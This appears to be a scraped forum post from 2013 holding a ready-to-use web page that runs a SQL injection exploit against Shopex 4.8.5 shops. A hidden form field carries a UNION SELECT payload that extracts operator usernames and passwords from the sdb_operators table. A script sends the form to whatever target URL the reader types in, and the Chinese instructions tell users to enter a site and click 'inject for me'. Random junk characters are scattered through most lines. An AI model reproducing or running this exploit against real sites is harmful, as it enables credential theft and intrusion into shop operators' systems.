<center>3 o4 F! S) ?' Y% ^0 q/ m2 I0 g P
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
0 |2 _) y+ j8 U! g5 b% Q<form action="" method="post" name="submit_url">
! J j! R9 L' y) }网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
4 v. r* O, x: k<input type="hidden" name="goods[goods_id]" value="3">+ I: z5 p, l% t8 @) f9 X& c7 E
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
$ U: o! A3 |- v& I0 A2 N- ^+ Y<input type="submit" value="给我注入" onclick=fsubmit()>. C, M# P% k/ M1 T
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
3 R8 M: W! |) V& y4 ~6 D
' z4 z7 T/ x) y& z% _+ `" d- l# S<script> * d* b, t& B+ m% k
function fsubmit(){ - s0 i" a: U3 N; Y6 D
form = document.forms[0]; : V1 H- a; X v; @: f
form.action = form.url.value+'/?product-gnotify';
2 c7 x U- i) l6 f# N# |/ f% qform.submit();
3 _ U+ L4 e: M' h- G0 L; z- c} " n7 O1 {/ M- J* J
</script>
+ b4 b0 A9 [' W9 [1 n) R |
发表于 2013-1-23 09:20:52
收藏
支持
反对